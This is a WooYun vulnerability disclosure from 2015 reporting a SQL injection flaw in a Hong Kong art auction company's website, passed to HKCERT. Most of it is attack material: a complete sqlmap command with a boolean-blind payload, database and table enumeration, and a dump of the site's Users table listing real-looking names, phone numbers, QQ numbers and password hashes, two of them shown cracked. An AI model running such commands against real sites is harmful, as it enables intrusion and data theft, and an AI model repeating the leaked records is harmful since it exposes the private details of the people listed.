当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157396

漏洞标题:中銀通國際拍賣有限公司网站存在SQL注入漏洞(用户密码电话qq真实姓名泄露)(香港地區)

相关厂商:中銀通國際拍賣有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 19:04

修复时间:2016-01-17 11:36

公开时间:2016-01-17 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

中銀通國際拍賣有限公司是壹家從事藝術品國際化的拍卖集團公司,成立于2012 年,總部設于香港島中央位置域多利皇后街裕成商业大厦内...

详细说明:

地址:http://**.**.**.**/ActionAllResult.aspx?MagazineId=105

$ python sqlmap.py -u "http://**.**.**.**/ActionAllResult.aspx?MagazineId=105" -p MagazineId --technique=B --random-agent --batch  -D YinTongDB -T dbo.Users -C UserName,UserId,TelPhone,QQ,Pwd,Name --dump


Database: YinTongDB
Table: Users
[8 entries]
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| UserName | UserId | TelPhone | QQ | Pwd | Name |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| osai | 1001 | 96267761 | <blank> | 0773679b3cd1a711cce49f82ceb89958 | LO SAI KING |
| ckh0402 | 1006 | 04-24735028 | <blank> | 0fc7291c073a80d86604ed57a76f12c9 | 陳坤鴻 |
| xsfwy | 1000 | 11111 | 12433 | 1308d20659585a8a661a0b4cbd96bf4e | aa |
| 木瓜 | 1003 | 0552-3029228 | 598174169 | 4608c58ae799e3def53e4834cfaaae66 | 李华明 |
| wangchao | 1005 | 0374-2620861 | 344050905 | 7e72fb27fc800c6e906557baee4ed1dc (wangchao) | 王超 |
| huaidanxiaomao | 1004 | 0373-12345678 | 244647611 | 94ff8acddc9359873d3e78a482b1ccb8 (huaidanxiaomao) | 毛咏 |
| 嚴三泰 | 1002 | 886-0972878867 | 2805669943 | d3e6d39e48e89b0c26702956886adfdf | 嚴三泰 |
| CHEN543216 | 1007 | <blank> | 1992714542 | f01136bef49a54a38f472f4879929ea6 | 陳證極 |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+

漏洞证明:

---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'waiyintong'
current user is DBA: False
database management system users [2]:
[*] sa
[*] waiyintong
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| INFORMATION_SCHEMA.SCHEMATA | 17 |
| sys.fulltext_languages | 17 |
| sys.schemas | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 14 |
| sys.master_files | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.database_mirroring | 7 |
| sys.database_recovery_status | 7 |
| sys.databases | 7 |
| sys.server_permissions | 7 |
| sys.sysdatabases | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.login_token | 3 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.server_role_members | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: YinTongDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Auction | 55294 |
| dbo.Magazine | 37 |
| dbo.Users | 8 |
| dbo.Admins | 2 |
| dbo.News | 2 |
| dbo.AuctionYG | 1 |
| dbo.Topic | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 22 |
| dbo.backupmediafamily | 11 |
| dbo.backupmediaset | 11 |
| dbo.backupset | 11 |
| dbo.restorefile | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YinTongDB
Table: Auction
[22 columns]
+---------------------+---------+
| Column | Type |
+---------------------+---------+
| AuctionDescription | varchar |
| AuctionId | varchar |
| AuctionIntroduction | varchar |
| AuctionName | varchar |
| Author | varchar |
| CaiZhi | varchar |
| ChengJiao | varchar |
| Id | int |
| LingYin | varchar |
| MagazineId | int |
| PhotoIMG | image |
| PhotoPath | text |
| QiPaiPrice | varchar |
| Reserve1 | varchar |
| Reserve2 | varchar |
| Reserve3 | varchar |
| Reserve4 | varchar |
| Reserve5 | varchar |
| Size | varchar |
| TiShi | varchar |
| YuGuPrice | varchar |
| ZhuangBiao | varchar |
+---------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YinTongDB
Table: Users
[25 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| Birthday | smalldatetime |
| CellPhone | nvarchar |
| CreateTime | smalldatetime |
| Email | nvarchar |
| FaceBook | nvarchar |
| Gender | char |
| Grade | int |
| Integration | int |
| limit | int |
| Name | nvarchar |
| Pwd | nvarchar |
| QQ | nvarchar |
| Reserve1 | varchar |
| Reserve2 | varchar |
| Reserve3 | varchar |
| Reserve4 | varchar |
| Reserve5 | varchar |
| TelPhone | nvarchar |
| UserAddress | nvarchar |
| UserId | int |
| UserImg | image |
| UserImgPath | text |
| UserName | nvarchar |
| UserStatus | int |
| WChar | nvarchar |
+-------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MagazineId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: MagazineId=105 AND 1968=1968
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YinTongDB
Table: Users
[8 entries]
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| UserName | UserId | TelPhone | QQ | Pwd | Name |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+
| osai | 1001 | 96267761 | <blank> | 0773679b3cd1a711cce49f82ceb89958 | LO SAI KING |
| ckh0402 | 1006 | 04-24735028 | <blank> | 0fc7291c073a80d86604ed57a76f12c9 | 陳坤鴻 |
| xsfwy | 1000 | 11111 | 12433 | 1308d20659585a8a661a0b4cbd96bf4e | aa |
| 木瓜 | 1003 | 0552-3029228 | 598174169 | 4608c58ae799e3def53e4834cfaaae66 | 李华明 |
| wangchao | 1005 | 0374-2620861 | 344050905 | 7e72fb27fc800c6e906557baee4ed1dc (wangchao) | 王超 |
| huaidanxiaomao | 1004 | 0373-12345678 | 244647611 | 94ff8acddc9359873d3e78a482b1ccb8 (huaidanxiaomao) | 毛咏 |
| 嚴三泰 | 1002 | 886-0972878867 | 2805669943 | d3e6d39e48e89b0c26702956886adfdf | 嚴三泰 |
| CHEN543216 | 1007 | <blank> | 1992714542 | f01136bef49a54a38f472f4879929ea6 | 陳證極 |
+----------------+--------+----------------+------------+---------------------------------------------------+-------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-03 11:34

厂商回复:

Referred to related parties.

最新状态:

暂无